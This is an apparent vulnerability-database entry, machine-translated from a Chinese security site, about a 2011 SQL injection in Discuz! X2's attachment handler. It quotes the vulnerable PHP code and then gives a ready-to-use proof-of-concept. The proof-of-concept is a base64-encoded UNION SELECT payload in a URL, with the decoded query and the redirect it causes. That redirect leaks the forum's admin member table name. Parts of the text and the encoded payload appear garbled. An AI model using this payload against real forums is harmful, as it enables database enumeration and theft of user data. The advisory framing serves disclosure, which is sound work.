Search...

Discuz! X2 SQL injection vulnerability-vulnerability warning-the black bar safety net

2011-08-06T00:00:00

ID MYHACK58:62201131478
Type myhack58
Reporter 佚名
Modified 2011-08-06T00:00:00

Description

Detailed description:

File: source\module\forum\forum_attachment.php

if(! defined('IN_DISCUZ')) {

exit('Access Denied');

}

define('NOROBOT', TRUE);

@list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t'], $_G['gp_uid'], $_G['gp_tableid']) = explode('|', base64_decode($_G['gp_aid']));

if(! empty($_G['gp_findpost']) && ($attach = DB::fetch_first("SELECT pid, tid FROM ". DB::table('forum_attachment')." WHERE aid='$_G[gp_aid]'"))) {

dheader('location: forum. php? mod=redirect&goto=findpost&pid='.$ attach['pid'].'& amp;ptid='.$ attach['tid']);

}

Variable aid directly base64_decode after the incoming SQL query, the resulting injection vulnerability to.

http://www.xxxx.net/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2Vszwn0idesvefctevftkfnrsbmcm9tielork9stufusu9ox1ndsevnqs5uqujmrvmgd2hlcmugvefctevfu0niru1bpwrhdgfiyxnlkckgyw5kicbuqujmrv9oqu1figxpa2ugjyvfbwvtymvyfhh8ehx4fhg%3D

After turning URL

http://www.xxxx.net/forum.php?mod=redirect&goto=findpost&pid=1&ptid=pre_common_admincp_member

Storm out the table name pre_common_admincp_member

The actual query is:

$x="1' and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA. The TABLES where TABLE_SCHEMA=database() and TABLE_NAME like '%_member|x|x|x|x";

//die (urlencode(base64_encode($x)));

JSON Vulners Source

Initial Source

{"type": "myhack58", "published": "2011-08-06T00:00:00", "reporter": "\u4f5a\u540d", "bulletinFamily": "info", "cvelist": [], "cvss": {"vector": "NONE", "score": 0.0}, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "lastseen": "2016-11-10T18:18:00", "viewCount": 15, "id": "MYHACK58:62201131478", "references": [], "edition": 1, "href": "http://www.myhack58.com/Article/html/3/62/2011/31478.htm", "modified": "2011-08-06T00:00:00", "title": "Discuz! X2 SQL injection vulnerability-vulnerability warning-the black bar safety net", "description": "Detailed description:\n\nFile: source\\module\\forum\\forum_attachment.php\n\nif(! defined('IN_DISCUZ')) {\n\nexit('Access Denied');\n\n}\n\ndefine('NOROBOT', TRUE);\n\n@list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t'], $_G['gp_uid'], $_G['gp_tableid']) = explode('|', base64_decode($_G['gp_aid']));\n\nif(! empty($_G['gp_findpost']) && ($attach = DB::fetch_first(\"SELECT pid, tid FROM \". DB::table('forum_attachment').\" WHERE aid='$_G[gp_aid]'\"))) {\n\ndheader('location: forum. php? mod=redirect&goto=findpost&pid='.$ attach['pid'].'& amp;ptid='.$ attach['tid']);\n\n}\n\nVariable aid directly base64_decode after the incoming SQL query, the resulting injection vulnerability to.\n\nhttp://www.xxxx.net/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2Vszwn0idesvefctevftkfnrsbmcm9tielork9stufusu9ox1ndsevnqs5uqujmrvmgd2hlcmugvefctevfu0niru1bpwrhdgfiyxnlkckgyw5kicbuqujmrv9oqu1figxpa2ugjyvfbwvtymvyfhh8ehx4fhg%3D\n\nAfter turning URL\n\nhttp://www.xxxx.net/forum.php?mod=redirect&goto=findpost&pid=1&ptid=pre_common_admincp_member\n\nStorm out the table name pre_common_admincp_member\n\nThe actual query is:\n\n$x=\"1' and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA. The TABLES where TABLE_SCHEMA=database() and TABLE_NAME like '%_member|x|x|x|x\";\n\n//die (urlencode(base64_encode($x)));\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645227321}}